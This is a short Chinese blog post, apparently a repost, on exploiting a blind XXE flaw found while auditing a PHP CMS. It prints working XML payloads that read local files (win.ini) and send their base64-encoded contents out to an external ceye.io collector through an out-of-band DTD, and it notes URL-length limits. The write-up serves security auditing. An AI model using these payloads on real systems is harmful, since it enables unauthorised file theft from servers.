首页 > 其他 > 详细

xxe盲注踩坑

时间:2019-08-07 19:33:41      阅读:406      评论:0      收藏:0      [点我收藏+]

 

 

 

 

 

今天审计某php语言的cms,发现一个xxe,原理很简单,但是用他读取文件时踩了个坑,记录一下

使用ceye平台接收下

poc:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://ckcvlb.ceye.io/xxe_test">
%remote;]>
<root/>

技术分享图片

 

尝试读取文件

poc:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "file:///c:/windows/win.ini">
%remote;]>
<root/>

 

技术分享图片

发现只能读取极少的内容,于是决定用oob来

 

poc:(由于审计代码时在本地,所以当时用的127.0.0.1,没有用公网服务器)

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE data [<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=c:/windows/win.ini"><!ENTITY % dtd SYSTEM "http://127.0.0.1/oob_poc.xml">%dtd; %all; ]> <value>&send;</value>

oob_poc.xml内容:

<!ENTITY % all "<!ENTITY send SYSTEM ‘http://ckcvlb.ceye.io/%file;‘>">

技术分享图片

 

 把请求后面的参数拿去base64解码即可。

说下我踩的坑:我一直想去读index.php文件

技术分享图片

 

 半天不知道什么愿意,后来网上查有人说是 外部实体中的 URI 有长度限制导致无法获取到

也有可能是大文件base64编码后内容也会非常多,放在url后面太长了,而url本身长度是有限制的

 

xxe盲注踩坑

原文:https://www.cnblogs.com/jinqi520/p/11317103.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!